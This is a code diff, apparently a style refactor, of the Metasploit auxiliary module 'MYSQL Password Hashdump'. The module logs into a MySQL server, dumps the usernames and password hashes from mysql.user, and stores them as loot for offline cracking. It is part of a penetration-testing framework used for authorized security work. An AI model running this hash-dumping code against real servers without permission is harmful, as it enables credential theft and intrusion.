@@ -12,75 +12,76 @@ class MetasploitModule < Msf::Auxiliary
1212 def initialize
1313 super (
1414 'Name' => 'MYSQL Password Hashdump' ,
15- 'Description' => %Q{
15+ 'Description' => %(
1616 This module extracts the usernames and encrypted password
1717 hashes from a MySQL server and stores them for later cracking.
18- } ,
18+ ) ,
1919 'Author' => [ 'theLightCosine' ] ,
2020 'License' => MSF_LICENSE
2121 )
2222 end
2323
2424 def run_host ( ip )
2525
26- if ( not mysql_login_datastore )
27- return
28- end
26+ return unless mysql_login_datastore
2927
3028 service_data = {
31- address : ip ,
32- port : rport ,
33- service_name : 'mysql' ,
34- protocol : 'tcp' ,
35- workspace_id : myworkspace_id
29+ address : ip ,
30+ port : rport ,
31+ service_name : 'mysql' ,
32+ protocol : 'tcp' ,
33+ workspace_id : myworkspace_id
3634 }
3735
3836 credential_data = {
39- module_fullname : self . fullname ,
40- origin_type : :service ,
41- private_data : datastore [ 'PASSWORD' ] ,
42- private_type : :password ,
43- username : datastore [ 'USERNAME' ]
37+ module_fullname : self . fullname ,
38+ origin_type : :service ,
39+ private_data : datastore [ 'PASSWORD' ] ,
40+ private_type : :password ,
41+ username : datastore [ 'USERNAME' ]
4442 }
4543
4644 credential_data . merge! ( service_data )
4745
4846 credential_core = create_credential ( credential_data )
4947
5048 login_data = {
51- core : credential_core ,
52- last_attempted_at : DateTime . now ,
53- status : Metasploit ::Model ::Login ::Status ::SUCCESSFUL
49+ core : credential_core ,
50+ last_attempted_at : DateTime . now ,
51+ status : Metasploit ::Model ::Login ::Status ::SUCCESSFUL
5452 }
5553 login_data . merge! ( service_data )
5654
5755 create_credential_login ( login_data )
5856
59- #Grabs the username and password hashes and stores them as loot
57+ # Grab the username and password hashes and store them as loot
6058 version = mysql_get_variable ( "@@version" )
61- if ( 5.6 < version [ 0 ..2 ] . to_f )
62- res = mysql_query ( "SELECT user,authentication_string from mysql.user" )
63- else
64- res = mysql_query ( "SELECT user,password from mysql.user" )
59+
60+ # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
61+ if version [ 0 ..2 ] . to_f > 5.6
62+ res = mysql_query ( "SELECT user,authentication_string from mysql.user" )
63+ else
64+ res = mysql_query ( "SELECT user,password from mysql.user" )
6565 end
66+
6667 if res . nil?
6768 print_error ( "There was an error reading the MySQL User Table" )
6869 return
6970 end
7071
7172 service_data = {
72- address : ::Rex ::Socket . getaddress ( rhost , true ) ,
73+ address : ::Rex ::Socket . getaddress ( rhost , true ) ,
7374 port : rport ,
7475 service_name : 'mysql' ,
7576 protocol : 'tcp' ,
7677 workspace_id : myworkspace_id
7778 }
7879
7980 credential_data = {
80- origin_type : :service ,
81- jtr_format : 'mysql,mysql-sha1' ,
82- module_fullname : self . fullname ,
83- private_type : :nonreplayable_hash
81+ origin_type : :service ,
82+ jtr_format : 'mysql,mysql-sha1' ,
83+ module_fullname : self . fullname ,
84+ private_type : :nonreplayable_hash
8485 }
8586
8687 credential_data . merge! ( service_data )
@@ -92,17 +93,12 @@ def run_host(ip)
9293 print_good ( "Saving HashString as Loot: #{ row [ 0 ] } #{ row [ 1 ] } )
9394 credential_core = create_credential ( credential_data )
9495 login_data = {
95- core : credential_core ,
96- status : Metasploit ::Model ::Login ::Status ::UNTRIED
96+ core : credential_core ,
97+ status : Metasploit ::Model ::Login ::Status ::UNTRIED
9798 }
9899 login_data . merge! ( service_data )
99100 create_credential_login ( login_data )
100101 end
101102 end
102-
103103 end
104-
105-
106-
107-
108104end
0 commit comments